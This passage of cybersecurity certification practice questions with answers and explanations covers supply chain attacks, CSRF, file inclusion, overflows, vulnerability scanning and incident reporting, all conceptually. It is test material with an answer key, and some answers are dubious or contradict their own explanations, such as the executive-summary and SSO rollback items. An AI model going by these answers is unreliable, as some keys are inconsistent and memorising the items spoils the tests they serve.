B. It enhances the ability to detect and respond to anomalous activity. C. It helps to reduce the risk of unauthorized access to sensitive data. Limiting access allows for more effective monitoring of network traffic, enhancing the ability to detect and respond to anomalous activity. Reducing the attack surface and limiting access to sensitive resources provide significant benefits to network security, such as reducing the risk of unauthorized access to sensitive data.

While looking into malware discovered on several workstations, an incident responder realizes it all came from new USB drives the company had recently procured. This could be an example of what type of attack? A. Data enrichment B. Supply chain C. Cousin domain D. Active defense

B. Supply chain Supply chain attacks involve identifying vendors and suppliers and leveraging them to gain access to an organization. Embedding malware into hardware or software an organization uses is an example of a supply chain attack.

A cybersecurity analyst investigates a suspicious process running on a server. The analyst discovers unexpected output and registry anomalies. Which of the following are true regarding unexpected output and registry anomalies during security operations? (Select the two best options.) A. Unexpected output can be a result of incorrect command syntax. B. Unexpected output can indicate malware activity. C. Registry anomalies can be caused by legitimate software updates. D. Registry anomalies always indicate a security breach.

B. Unexpected output can indicate malware activity. C. Registry anomalies can be caused by legitimate software updates. Malware often tries to conceal its presence on a system by modifying the system's behavior, which can result in unexpected output. Some software installs or updates may modify the Windows registry to change settings or add new ones, causing registry anomalies.

A medium-sized business collects and analyzes all security-related logs from various sources, including web servers and payment processing systems, to detect and respond to security incidents in real time. By implementing centralized logging, the organization hopes to enhance its ability to prevent and mitigate cyber-attacks, as well as comply with regulatory requirements. Which of the following statements accurately describe the role of centralized logging in cyber security operations? A. Centralized logging provides a way for attackers to bypass security measures and access sensitive information. B. Centralized logging makes it difficult for security personnel to monitor system activity. C. Centralized logging allows security personnel to track and analyze system activity, detect potential security incidents, and respond quickly to threats. D. Centralized logging only benefits large organizations with complex

C. Centralized logging allows security personnel to track and analyze system activity, detect potential security incidents, and respond quickly to threats. Centralized logging is a critical component of a comprehensive cyber security strategy. Consolidating log data from multiple sources, such as servers, firewalls, and network devices, enables security personnel to quickly identify and investigate potential security incidents, as well as monitor system activity in real time.

An analyst is reviewing alerts in the security information and events manager (SIEM). Which of the following might lead them to suspect there has been malicious activity? A. Data enrichment B. APIs C. Reverse shell D. Active defense

C. Reverse shell A reverse shell causes a victim system to initiate a shell session with the attacker's host. Reverse shell activity is unlikely to be legitimate, and the analyst should always investigate.

A threat actor stole 1,000 credit card numbers from an online retailer. Where might the actor try to sell these records? A. CSIRT B. ISACs C. The deep/dark web D. OSINT

C. The deep/dark web The deep/dark web provides cybercriminals and other malicious actors a platform to conduct illicit activity like planning upcoming attacks, exchanging information, and selling stolen goods.

A security analyst at a financial institution plans to use PowerShell and XML to secure an organization's servers. What is the primary purpose of using XML in this context, and how can PowerShell help in securing the servers? A. XML encrypts sensitive data on the servers, while PowerShell automates security-related tasks on the servers. B. XML detects security threats on the servers, while PowerShell monitors server logs for suspicious activity. C. XML provides a common format for exchanging data between systems, while PowerShell helps automate server hardening and configuration tasks. D. XML manages server configurations, while PowerShell authenticates users who access the servers.

C. XML provides a common format for exchanging data between systems, while PowerShell helps automate server hardening and configuration tasks. Extensible Markup Language (XML) describes, stores, and transmits data. PowerShell is a scripting language that automates server hardening and configuration tasks such as managing user accounts, configuring firewalls, and performing system maintenance tasks.

Which of the following is a reason why time synchronization is important in security operations? A. To maintain system performance B. To prevent unauthorized access to sensitive data C. To improve network throughput D. To ensure accurate timestamps on security-related events

D. To ensure accurate timestamps on security-related events Accurate timestamps are critical for forensic analysis of security events and for correlating events across systems; if clocks drift, log entries from different hosts cannot be placed in the correct order. Synchronizing every host to a trusted time source (for example via NTP) and logging in UTC avoids this.

A security analyst working for a financial institution notices abnormal behavior in a workstation's operating system (OS) and identifies multiple unauthorized scheduled tasks and file system anomalies on the affected workstation. Which of the following options is the most likely explanation for these issues? A. The operating system of the workstation is outdated, and the security patches have not been applied, leading to system vulnerabilities that have been exploited. B. An insider threat with access to the workstation is intentionally creating these abnormalities to sabotage the company's security posture. C. The security analyst is experiencing false positives from their security tools, and there are no actual anomalies present. D. A virus has infected the workstation, allowing remote attackers to execute arbitrary code and run malicious tasks.

D. A virus has infected the workstation, allowing remote attackers to execute arbitrary code and run malicious tasks. The abnormal OS process behavior, file system anomalies, and unauthorized scheduled tasks on the workstation could be a sign of a virus infection allowing remote attackers to execute arbitrary code and run malicious tasks, leading to system vulnerabilities.

A security analyst needs to select an appropriate tool to detect and analyze malware in an organization's network. The analyst needs to decide which tool is best for detecting and analyzing malware through virtualized environments. Which of the following tools can be used to detect and analyze malware through virtualized environments? A. Wireshark B. Snort C. Malwarebytes D. Cuckoo Sandbox

D. Cuckoo Sandbox Cuckoo Sandbox specifically detects and analyzes malware in a safe and isolated environment. Cuckoo Sandbox is an open-source software for automating malware analysis in a virtualized environment.

An organization has chosen to automatically ingest indicators. This action is most likely intended to ensure what desired threat intelligence attribute? A. Relevancy B. Accuracy C. APT D. Timeliness

D. Timeliness Timeliness is the speed at which the system collects and disseminates threat intelligence. Information rapidly disseminated is timely. This helps ensure it is up-to-date and remains maximally useful.

A company has recently experienced a data breach, and the security team needs to report the incident to upper management. What are the primary purposes of the executive summary of the report? (Select the three best options.) A. A description of the impact on customers and partners B. A timeline of the incident C. Recommendations for improving cybersecurity D. Technical details about the attack

A. A description of the impact on customers and partners B. A timeline of the incident C. Recommendations for improving cybersecurity The executive summary for external stakeholders should focus on the impact of the incident on them rather than technical details or recommendations. It will help build trust and maintain relationships with customers and partners. The executive summary includes a timeline of the incident; the timeline also has its own section in the incident report. The executive summary may include recommendations for improving cybersecurity; recommendations also have their own section in the incident report.

An organization has just experienced a major cyberattack, and the incident response team needs to report the incident to external stakeholders, including customers. What should be in the executive summary of the report? A. A description of the impact on customers and partners B. A timeline of the incident C. Technical details about the attack D. Recommendations for improving cybersecurity

A. A description of the impact on customers and partners The executive summary for external stakeholders should focus on the impact of the incident on them rather than technical details or recommendations. It will help build trust and maintain relationships with customers and partners.

Which of the following scenarios is the most accurate example of a stack overflow? A. A program attempts to write data beyond the end of a fixed-size buffer. B. A program allocates memory to a dynamic buffer without proper bounds checking, leading to a buffer overflow. C. A program fails to check the return value of a function that could fail, leading to unpredictable behavior. D. A program fails to sanitize user input, leading to a SQL injection attack.

A. A program attempts to write data beyond the end of a fixed-size buffer. Stack overflow is a software vulnerability that occurs when a program tries to store more data in the stack than it can handle. The stack has a fixed size and manages data within the program's memory.

An HVAC company's web application allows users to schedule appointments with their HVAC technicians. The application runs on outdated software and represents a security risk, but the software is also critical for the company's operations. The company decides not to upgrade the application and keep it as-is for business reasons. What kind of risk response does this represent? A. Acceptance B. Transference C. Avoidance D. Mitigation

A. Acceptance Risk acceptance refers to operating without change after evaluating an identified risk item. The risk item could be in the form of software, hardware, or existing processes. It is important to consider that there is risk in everything; even simple tasks in day-to-day life involve risks.

A managed security service provider (MSSP) is deploying a sensor on a new client's network. The service level objectives (SLOs) agreed between the two parties require vulnerability scans that enumerate services and perform banner grabbing. These services directly interact with the devices/software to identify vulnerabilities. Which method of vulnerability scanning would BEST meet the goals arranged in the SLOs? A. Active B. Passive C. Agent D. Agentless

A. Active Active scanning includes using a vulnerability scanner, enumerating services, performing banner grabbing, content enumeration, or using a web application scanner such as Burp Suite or Open Web Application Security Project (OWASP) Zed Attack Proxy (ZAP).

A company has conducted a vulnerability assessment and identified multiple vulnerabilities in its system. However, the IT team has limited resources and cannot address all vulnerabilities at once. What is the most appropriate step for the company to take in this situation? (Select the three best options.) A. Address the most severe vulnerabilities first B. Mitigate vulnerabilities as rapidly as possible, before a threat actor can exploit them C. Mitigate the vulnerabilities in order of the number of affected hosts by a potential breach D. Mitigate the vulnerabilities, which provides opportunities to replace primary controls with compensating controls first

A. Address the most severe vulnerabilities first B. Mitigate vulnerabilities as rapidly as possible, before a threat actor can exploit them C. Mitigate the vulnerabilities in order of the number of affected hosts by a potential breach Risk prioritization, addressing the most severe vulnerabilities first, is a best practice for reacting to the findings of a vulnerability assessment. Mitigating vulnerabilities as rapidly as possible will help the team prevent exploitation by threat actors. Mitigating the vulnerabilities in order of the number of hosts a potential breach would affect helps prioritize vulnerabilities. Note that some vulnerabilities may affect many hosts but only result in minor damage.

The company has contracted a managed security service provider (MSSP) to implement new vulnerability scanning methods across the company's endpoints. Additional security effort is needed because this method requires testing, maintenance, and deployment, as well as protection against the new attack vectors it introduces. Which vulnerability scanning method is the company in the process of incorporating? A. Agent B. Agentless C. Active D. Passive

A. Agent Agent-based scans require the installation of software utilities to collect information from the endpoint and pass it to the vulnerability scanner.

The security team at a large organization wants to improve its incident response process by analyzing the patterns and behaviors of threat actors. Based on the collected data, they are also looking for ways to adapt their defenses and response strategies. What should the team focus on to continuously improve their incident response capabilities? A. Analyze threat intelligence and adapt strategies B. Implement stronger authentication mechanisms C. Regularly update firewall rules D. Deploy additional security tools

A. Analyze threat intelligence and adapt strategies The team can continuously improve its incident response capabilities by analyzing threat intelligence and adapting strategies based on the patterns and behaviors of threat actors. This approach aligns with the principles of the MITRE ATT&CK framework and the Diamond Model of Intrusion Analysis.

A company's website is vulnerable to several attack vectors. The company has hired a red team to identify these vulnerabilities and exploit them to gain access to the company's systems. What is the best way to mitigate the risk of these attacks? A. Attack surface reduction B. Security control testing C. Penetration testing and adversary emulation D. Bug bounty

A. Attack surface reduction Attack surface reduction reduces all potential pathways a threat actor could use to gain unauthorized access or control. Reducing attack vectors will increase the cybersecurity posture of the organization.

A cyber security analyst is reviewing a vulnerability assessment report. The analyst focuses on the weaponization metrics considering the ease with which an attacker can produce a usable exploit. The analyst will pay close attention to which exploitability metrics? (Select the three best options.) A. Attack vectors B. Attack complexity C. User interaction D. Exploit code maturity

A. Attack vectors B. Attack complexity C. User interaction Exploitability, the ease and likelihood of exploiting a vulnerability, involves attack vector, attack complexity, privileges required, and user interaction. An attack vector indicates the level of access an attacker needs to exploit a vulnerability. Attack complexity refers to the availability of tools and techniques required to exploit a vulnerability. User interaction (UI) refers to exploitation of the vulnerability depending on some local user action, such as executing a file attachment.

A SOC manager identifies frequent human errors when analysts perform a specific repeatable human process. What is an effective way to eliminate these errors? (Select the two best options.) A. Automating the task B. Implementing webhooks C. Implementing a single pane of glass D. Purchasing plugins

A. Automating the task B. Implementing webhooks Automating processes removes human interaction. Operator fatigue can sometimes result in human error. Webhooks are a kind of automation in which an application sends automated messages. The messages are sent to a unique URL and include relevant information like data about the event and the time it occurred.

Which of the following sources are potential sources of offensive open-source intelligence (OSINT)? (Select the three best options.) A. Blogs and social media B. HTML code C. Government bulletins D. Metadata

A. Blogs and social media B. HTML code D. Metadata Blogs and social media are potential sources of open-source intelligence (OSINT). Employee blogs often contain information valuable to an attacker, including pattern-of-life data, contact information, or details relating to social engineering. A document's metadata may contain hidden information an organization does not intend to reveal, such as the names of its author and editors. HTML code can reveal sensitive information such as internal IP addresses, file paths, the names of sensitive servers, or software versions.

A customer logs into their bank account and simultaneously checks their email. They see an email containing a link that, when clicked, initiates a transfer of funds from the user's bank account to an attacker's account. What type of vulnerability does this situation describe? A. CSRF B. Broken access control C. Injection D. XSS

A. CSRF Cross-site request forgery (CSRF) is a web application vulnerability allowing an attacker to perform actions on behalf of an authenticated user. This attack happens when a victim unknowingly clicks a malicious link or submits a malicious form.

A cybersecurity professional analyzes incident response activities within their organization. When determining the effectiveness of remediation efforts, what should the professional do to measure the impact of a security incident on the organization? A. Calculate the total cost of lost productivity and system downtime B. Assess the reduction in system vulnerabilities after remediation C. Evaluate the effectiveness of the organization's disaster recovery plan D. Monitor the implementation of multi-factor authentication (MFA) across the organization

A. Calculate the total cost of lost productivity and system downtime By calculating the financial costs related to lost productivity and downtime, the professional can measure the impact of a security incident on the organization and the effectiveness of remediation efforts.

When checking the scan output from the Nmap tool, how can an administrator determine the type of applications or services that are using an open port? (Select the two best options.) A. Check service information B. Check port information C. Check state information D. Check workspace snapshot information

A. Check service information B. Check port information The service column of the scan report, shown on the command line, indicates what type of service is using the port, for example, HTTPS, ldap, or ldapssl. The port information in the scan report can also identify the type of service using the port. Most administrators know the common TCP/IP ports, for example, 443 (HTTPS) or 389 (ldap).

The HTML report from the Prowler assessment tool confirmed that the Amazon Web Services (AWS) account does not currently support the virtual authenticator application on company smartphones for the root account. However, the root account can still access all services. When examining the report, what can a security administrator check to find out more information about this security finding? A. Check status extended column B. Check service name column C. Check severity column D. Check rules column

A. Check status extended column The status extended column provides more information on the security finding. In this case, the description may state, "MFA is not enabled for root account."

When reviewing the issues on the Arachni web user interface (UI), how can a web administrator determine the way in which the system detected a cross-site scripting vulnerability on a targeted site? A. Check the input section B. Check the intruder section C. Check the repeater section D. Check the dispatchers section

A. Check the input section The input section of an issue reported in the Arachni web UI shows which input field (for example, an id or username field) the scanner used to detect the cross-site scripting (XSS) vulnerability on the target website.

A security analyst for a large financial institution notices abnormal OS process behavior, unauthorized changes, and file system changes occurring on one of the company's servers. The analyst believes there may be a security breach. What is the best way to confirm the analyst's suspicions of a breach? A. Check the system logs for unusual activity B. Conduct a full system backup to ensure that data is not lost C. Ask all employees who have access to the server if they made any changes D. Shut down the server immediately to prevent further damage

A. Check the system logs for unusual activity System logs record all activity on a server, including processes and file changes, which makes them an excellent resource for detecting security breaches.

A security analyst is working on an incident involving a web application attack. They need to refer to certain industry-standard frameworks to identify the stages of the attack and potential vulnerabilities that the attacker exploited. Which of the following actions should the analyst take to gain insight into the incident? A. Conduct a thorough log analysis B. Perform a risk assessment C. Implement network segmentation D. Enforce strict password policies

A. Conduct a thorough log analysis By conducting a thorough log analysis, the analyst can identify the stages of the attack and potential vulnerabilities exploited, as described in the cyber kill chain and Open Web Application Security Project (OWASP) Testing Guide.

A security analyst at an e-commerce company must understand the outcomes from a recent vulnerability report and develop an action plan to address identified issues. What should be the analyst's primary focus in creating an effective action plan? A. Conducting a root cause analysis of the identified vulnerabilities B. Analyzing lessons learned from previous vulnerability assessments C. Implementing regular security awareness training programs D. Establishing a vulnerability scoring system

A. Conducting a root cause analysis of the identified vulnerabilities Performing a root cause analysis allows the security analyst to understand the underlying causes of the identified vulnerabilities, which is crucial for developing an effective action plan to address and mitigate those issues.

A security operations center (SOC) manager wants to increase the use of automation. What are some things they should consider when trying to prioritize tasks for automation? (Select the three best options.) A. Consider the frequency of a task B. Consider the level of effort required for a task C. Consider what tasks support security in high-risk areas D. Consider the known IoCs

A. Consider the frequency of a task B. Consider the level of effort required for a task C. Consider what tasks support security in high-risk areas The more frequently analysts perform a task, the more likely they are to save significant time by automating it. Tasks that require a great deal of manual effort are good candidates for automation. Tasks important to the security of areas that are at higher risk of attack are good candidates for automation.

A large corporation has suffered a ransomware attack, significantly disrupting its operations and losing critical data. The attacker was able to exploit a known vulnerability in the organization's software that was exposed due to a lack of proper updates. What could have helped prevent this attack? A. Consistently applying patches using proper patch management procedures B. Securely configuring systems in accordance with configuration management procedures C. Implementing service-level objectives (SLOs) to ensure a reduction in breaches D. Providing awareness, education, and training on how to recognize and respond to cyber attacks

A. Consistently applying patches using proper patch management procedures Consistently applying patches using proper patch management procedures would prevent this issue from reoccurring in the future. Security updates prevent threat actors from exploiting vulnerabilities.

A company just experienced a data breach that resulted in losing sensitive customer information. The information disclosure is disastrous, and the company's stock has dropped precipitously. What functional type of controls should the company implement to mitigate the damages? A. Corrective B. Preventative C. Technical D. Managerial

A. Corrective Corrective controls act to eliminate or reduce the impact of an intrusion event. The company should use a corrective control after the data breach to help reduce the impact of the attack.

A cybersecurity analyst is investigating a security incident and must ensure that the collected data remains uncompromised and retains its integrity. Which of the following actions would be the most appropriate to achieve this goal while conducting the investigation? A. Create and store cryptographic hash values of the collected data B. Encrypt the collected data using a secure encryption algorithm C. Regularly back up the collected data to an external storage device D. Use a secure collaboration platform to share the data with team members

A. Create and store cryptographic hash values of the collected data The analyst can ensure data integrity and verify that no one has tampered with the data collected during the investigation by creating and storing cryptographic hash values. This supports evidence preservation and maintains the chain of custody.

A new cybersecurity team is in the process of enhancing raw data with additional information to make it more valuable for analysis and decision-making, such as adding context, metadata, or other relevant data points. Which of the following best describes the actions they are undertaking? A. Data enrichment B. Threat feed combination C. Essential strategy D. Preemptive actions

A. Data enrichment Data enrichment is the process of enhancing raw data with additional information to make it more valuable for analysis and decision-making. This can involve adding context, metadata, or other relevant data points to provide a more complete and accurate understanding of the data.

A cybersecurity professional must analyze a security incident within an organization. Applying knowledge of attack methodology frameworks is essential to manage the situation effectively and prevent future attacks. Which action should the professional prioritize in this context? A. Determine the scope of the incident B. Preserve the integrity of digital evidence C. Deploy additional security monitoring tools D. Implement stricter access controls on sensitive data

A. Determine the scope of the incident Identifying the scope of the incident allows for a better understanding of the affected assets and the extent of the compromise. This is a crucial step in guiding the response strategy and mitigating the risk of future attacks.

The security analyst at a large organization is on the lookout for any active threats to the company's network. The organization requests that the analyst use the MITRE ATT&CK framework and the cyber kill chain model to monitor and analyze these threats. Upon receiving an alert about a potential spear-phishing attack, what should the analyst do first to evaluate the situation? A. Determine the stage of the attack in the cyber kill chain B. Examine post-exploitation actions taken by the attacker C. Implement security measures informed by the MITRE ATT&CK framework D. Evaluate the company's incident response protocol

A. Determine the stage of the attack in the cyber kill chain The primary focus of the analyst should be to identify the attack stage in the Cyber Kill Chain model. Understanding the stage of the attack helps the analyst determine the scope and potential impact of the threat and guides the response actions accordingly.

The cybersecurity leadership team of a company is reviewing its incident response plan (IRP) and must consider the role of business continuity (BC) and disaster recovery (DR) in the IRP. How should the company account for BC/DR in its incident response plan? A. Develop and test BC/DR plans for operational resilience B. Conduct regular tabletop exercises C. Train employees on phishing awareness D. Establish an incident response team

A. Develop and test BC/DR plans for operational resilience Integrating BC/DR plans into the IRP can help ensure operational resilience and help the company recover from potential disruptions to its business operations. Developing and testing BC/DR plans can help improve the effectiveness of its IRP.

Nation-state actors successfully breached another country's government agency and stole some hard drives. The stolen hard drives hosted only a single virtual appliance replicating to another remote location. A scan of the remaining systems showed that data was easily accessible through physical means. How can the system administrators improve their security for data at rest? A. Encrypt the virtual server B. Set up backup targets C. Configure high availability D. Set up for disaster recovery

A. Encrypt the virtual server Encryption provides data-at-rest security for virtual and physical servers at the drive level. For example, if a hard drive gets stolen, the data is not recoverable without the decryption keys.

An organization regularly generates vulnerability reports using automated tools. One of the reports has identified a vulnerability with a high-risk score previously addressed in an old report. After an investigation, the organization found that the newly added assets reintroduced old problems. What should the organization do to prevent such recurrence in the future? A. Ensure that the asset inventory is accurate B. Develop policies and procedures for generating vulnerability reports on a regular schedule C. Follow best practices and improve the effectiveness of reports by using consistent formats D. Conduct scans manually

A. Ensure that the asset inventory is accurate One of the causes of recurring vulnerabilities was an inaccurate asset inventory. In this case, the organization needs to ensure that the asset inventory is accurate to prevent previously addressed vulnerabilities from reappearing in the report.

The Department of Homeland Security announces a binding operational directive for federal agencies. This is an example of what? A. Government bulletins B. CERT C. MITRE ATT&CK D. Metadata

A. Government bulletins Government bulletins contain information and advice related to defending against cyber threats. A binding operational directive is a government bulletin that contains guidance federal agencies must implement.

A web application that allows users to upload images to their profile has a security vulnerability. An attacker can upload a specially crafted image, causing the web application to try to write data beyond the end of a portion of memory allocated dynamically at run time. The application does not properly handle the overflow, allowing the attacker to execute arbitrary code on the server. What type of vulnerability does this situation describe? (Select the two best options.) A. Heap overflow B. Buffer overflow C. Stack overflow D. Integer overflow

A. Heap overflow B. Buffer overflow Heap overflow is a software vulnerability where the system allows input to overwrite memory locations within the area of a process's memory allocation. The memory allocation stores dynamically sized variables. Buffer overflow is an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. Buffer overflow is a general term referring to both heap and stack overflows.

The power plant's operational technology specialist routinely inspects all operational controls. Which of the following are examples of operational technologies (OTs)? (Select the three best options.) A. ICSs B. PLCs C. SCADA systems D. SaaS

A. ICSs B. PLCs C. SCADA systems An industrial control system (ICS) is a network that manages embedded devices, such as computer systems, designed to perform a specific, dedicated function. Programmable logic controllers (PLCs) are a form of digital computer used in industrial settings, designed to enable automation in assembly lines, autonomous field operations, robotics, and many other applications. Supervisory Control and Data Acquisition (SCADA) is an industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas from a host computer.

A company has been the victim of an information breach. The breach has exposed the personal information of millions of customers. The company is facing a number of lawsuits and fines. What is the best way to mitigate the damage from the breach? A. Identify and communicate with all stakeholders B. Identify and report an incident C. Establish who, what, when, where, and why the incident occurred D. Create recommendations on reducing vulnerability

A. Identify and communicate with all stakeholders Stakeholder identification and communication are important parts of crisis management. In a data breach, it is important to identify and communicate with all stakeholders affected, such as customers, employees, investors, and regulators.

A security analyst at a financial institution is responsible for identifying active threats to the organization's network. The analyst uses the Open Source Security Testing Methodology Manual (OSSTMM) and the Open Web Application Security Project (OWASP) Testing Guide to monitor and analyze these threats effectively. The analyst receives an alert about a potential spear-phishing attack targeting employees. When using these methodologies to assess the situation, what should be the analyst's primary focus? A. Identifying threat indicators and potential vulnerabilities B. Implementing security controls based on OSSTMM recommendations C. Conducting penetration testing on the organization's web applications D. Reviewing the company's security policies and procedures

A. Identifying threat indicators and potential vulnerabilities By using the OSSTMM and OWASP Testing Guide to assess an active threat like a spear-phishing attack, the analyst can determine the scope and potential impact of the threat to help guide response actions effectively.

A company is implementing a new authentication system that uses passwordless and SSO capabilities. During the rollout, the IT team notices some employees are having trouble accessing certain applications and resources, while others are experiencing no issues. Upon investigation, the team discovers that some applications and resources are not compatible with the new system. What is the best course of action for the IT team to take in response to this issue? A. Immediately roll back the passwordless and SSO authentication system and revert to the previous system B. Contact the vendors of the incompatible applications and resources to see if they have updates that will make them compatible with the new system C. Notify all employees to use their previous login credentials until the incompatible applications and resources are updated D. Ignore the issue and allow some employees to be unable to access certain applications and resources

A. Immediately roll back the passwordless and SSO authentication system and revert to the previous system Immediately rolling back the passwordless and SSO authentication system and reverting to the previous system is the best option because it will restore the system to the previous state in which all employees could access all applications and resources.

A cybersecurity analyst has to identify active threats within their organization. To preserve relevant data and logs for potential legal proceedings, what action should the analyst take while conducting the investigation? A. Implement a legal hold B. Backup all relevant data C. Store relevant data on encrypted external storage D. Provide the legal department with relevant data

A. Implement a legal hold Placing a legal hold on the relevant data and logs ensures their preservation for potential legal proceedings while allowing the continuation of the investigation. It prevents the alteration or deletion of the data and logs in question.

An HVAC company's cybersecurity department has discovered a critical security vulnerability in their host devices and has received a patch from the vendor. What is the best way to ensure the cybersecurity department addresses and fixes the vulnerability? A. Implementation B. Rollback C. Validation D. Software development life cycle

A. Implementation Patch implementation deploys patches or configuration changes to software or systems to correct security vulnerabilities, bugs, or other issues.

An organization recently experienced a cyber incident that temporarily halted its operations. The cybersecurity team wants to strengthen its resilience strategies and address potential threats before they cause significant harm. As part of this process, the team must look into the primary factor behind the recent incident. Which of the following techniques would most effectively pinpoint the cause and enhance operational preparedness? A. Implementing a hypothesis-driven investigation B. Analyzing historical logs C. Focusing on real-time network monitoring D. Conducting penetration tests on critical systems

A. Implementing a hypothesis-driven investigation A hypothesis-driven investigation involves proactively searching for potential threats based on specific assumptions. This allows the team to focus on possible causes and identify previously unknown issues, improving the organization's operational preparedness.

A healthcare provider has recently experienced a data breach resulting from sniffing attacks against its employee web portal for authentication. The incident response team needs to provide recommendations for improving the organization's response plan. Which of the following recommendations would be the most effective? A. Implementing multi-factor authentication B. Upgrading the firewall software C. Running regular vulnerability scans D. Conducting security awareness training for employees

A. Implementing multi-factor authentication Multi-factor authentication is a critical security measure that can prevent unauthorized access to systems and data. This recommendation can help the organization strengthen its security posture and prevent future attacks.

What are the advantages of implementing single sign-on (SSO) technology for an organization's authentication process? (Select the two best options.) A. Improving user experience by reducing the need for multiple logins and passwords B. Enabling passwordless authentication through the use of smart cards or mobile devices C. Eliminating the need for multi-factor authentication (MFA) D. Providing an additional layer of security through the use of biometric authentication

A. Improving user experience by reducing the need for multiple logins and passwords B. Enabling passwordless authentication through the use of smart cards or mobile devices Single sign-on (SSO) technology enhances security and simplifies access management by allowing users to authenticate to multiple applications or systems with a single set of credentials, thereby reducing the need for multiple logins and passwords. Passwordless authentication via SSO further improves security by using more secure methods like smart cards or mobile devices.

The IT department at a healthcare organization is developing a training program to improve overall security awareness among employees. Which of the following elements should they include in the training program to effectively communicate the real-world consequences of inadequate security practices and emphasize the importance of proper security measures and protocols? A. Incorporate lessons learned from past security incidents B. Provide open discussions and feedback C. Develop targeted communication strategies for different departments D. Ensure consistent messaging across all training materials

A. Incorporate lessons learned from past security incidents Including lessons learned from past incidents in the training program effectively communicates the real-world consequences of inadequate security practices and emphasizes the importance of adhering to proper security measures and protocols.

A database engineer notices altered database records. The engineer first notifies the correct parties and reports the compromise immediately. Which of these would best identify the type of impact metric the engineer encountered? A. Integrity B. Availability C. Confidentiality D. Privacy

A. Integrity The impact of a vulnerability considers the potential damage caused by successful exploitation and the effort required to mitigate it. Integrity issues arise when the system's data or functionality is changed or impaired (e.g., modification of database records).

A security analyst encounters multiple vulnerabilities relating to a file server on the 192.168.52.0/26 network. However, due to firewall rules, the file server is only exploitable on port 445 by specially crafted packets coming from the 192.168.52.5 host. What type of network vulnerability has the security analyst discovered? A. Internal B. External C. Isolated D. SCADA

A. Internal The address 192.168.52.0/26 is in a private IP space, which indicates an internal network vulnerability. Private network IP ranges are not routable on the public internet, so the vulnerability is only reachable from inside the network.

A security analyst at a large financial institution monitors network traffic for any unusual activity. The analyst notices an unusual spike in network traffic occurring on an unexpected port, indicating possible malicious activity. Which of the following actions should the analyst take in response to this anomalous activity? (Select the two best options.) A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity C. Immediately block traffic on the unexpected port D. Monitor the activity for a longer period to confirm that it is not simply a temporary anomaly

A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity Investigating the traffic to determine its source and destination is essential to understanding the nature of the anomalous activity. Alerting the manager and other relevant parties about anomalous activity is critical in ensuring a swift and coordinated response to any potential security threats.

While monitoring the network traffic of a large financial institution, a security analyst notices an unusual pattern of outgoing traffic occurring on an unexpected port. Which of the following actions should the analyst take in response to this anomalous activity? (Select the two best options.) A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity C. Immediately block traffic on the unexpected port D. Monitor the activity for a longer period to confirm that it is not simply a temporary anomaly

A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity Investigating the traffic to determine its source and destination is essential to understanding the nature of the anomalous activity. Alerting the manager and other relevant parties about anomalous activity is critical in ensuring a swift and coordinated response to any potential security threats.

During a digital forensic analysis, an analyst may generate what kinds of useful information? (Select the three best options.) A. IoCs B. Vulnerabilities C. Misconfigurations D. OSINT

A. IoCs B. Vulnerabilities C. Misconfigurations Indicators of Compromise (IoCs) are items that suggest a compromise may have occurred. These can include communications with a malicious domain or IP, suspicious network traffic, or unusual privileged account activity. Identification of an IoC warrants additional investigation. Vulnerabilities are flaws in a system, software, or device that weaken security and present an opportunity for exploitation. Misconfigurations are deviations from required configuration standards. Misconfigurations create an opportunity for exploitation.

A cybersecurity professional is helping with their organization's incident response planning. When dealing with a security incident, the professional must prioritize preserving critical data and the remediation of affected systems. Which of the following actions should the professional take to address these priorities effectively? A. Isolate the affected systems and create secure backups of critical data B. Encrypt all sensitive data and share it with the incident response team C. Immediately notify all employees about the security incident D. Perform a complete system restore without creating backups

A. Isolate the affected systems and create secure backups of critical data Isolating the affected systems helps to prevent the spread of the security threat, allowing for effective remediation. Creating secure backups of critical data ensures its preservation and availability during the incident response process.

A web application allows users to download files by specifying a file name in the URL. An attacker manipulates the URL to include a file path located on the server, and the application does not properly validate the input. As a result, the attacker can download sensitive files that should not be accessible to them. What type of vulnerability does this situation describe? A. Local file inclusion B. Remote file inclusion C. RCE D. XSS

A. Local file inclusion Local file inclusion (LFI) allows attackers to access local files on the server hosting a web application. LFI can occur from bad input validation or insecure coding practices. This file inclusion is local since the file resides on the target server.

An information security project manager has an important stakeholder meeting for the security operations center's (SOC's) future projections. Most executives will require visualizations of critical systems across the network and how they correlate to simulated attacks, which the SOC has built controls around. Which tool can help stakeholders understand how the mapped network prevents mock attacks? A. Maltego B. Prowler C. ScoutSuite D. Nmap

A. Maltego Maltego is a very sophisticated visualization tool that helps investigators quickly identify relationships among entities of many types. As a result, Maltego can help in many investigations, from people and social engineering to malware analysis.

A cloud security analyst is reviewing the output of a cloud vulnerability assessment. The analyst's primary objective is to determine which vulnerabilities pose the greatest risk to the organization. Which approach should the analyst prioritize to achieve this goal? A. Map vulnerabilities to the Diamond Model's elements to prioritize remediation B. Implement encryption for all data at rest and in transit C. Enforce strict Identity and Access Management (IAM) policies D. Regularly review cloud provider security documentation

A. Map vulnerabilities to the Diamond Model's elements to prioritize remediation By mapping the identified vulnerabilities to the Diamond Model's elements, the analyst can prioritize the remediation of vulnerabilities with the greatest potential impact on the organization. This approach aligns with the Open Web Application Security Project (OWASP) Testing Guide's methodology, which focuses on identifying and mitigating the most severe risks.

A pipe fitting company has experienced a data breach, and the security team has initiated a movement to contain the source of the breach 428 minutes after the breach began. It is roughly in line with the team's normal performance for this task. What metric does this refer to? A. Mean time to respond B. Mean time to remediate C. Alert volume D. Mean time to detect

A. Mean time to respond The mean time to respond is the average time it takes to react to a security incident or event after the organization detects the event. The team took 428 minutes to respond to the breach initially.

After discovering malicious activity on a network, what artifacts might a threat hunter analyze to identify additional indicators of compromise (IoCs)? (Select the three best options.) A. Memory dumps B. Network traffic C. Paid feeds D. Log files

A. Memory dumps B. Network traffic D. Log files Log files are records of events on a given system. Threat hunters develop indicators of compromise (IoCs) based on specific events found in the logs. Memory dumps are records of the information contained in RAM. They can provide valuable information about running processes that may not be available anywhere else. Network traffic is the information transiting a network. Monitoring it for specifically formatted information can help identify malicious activity.

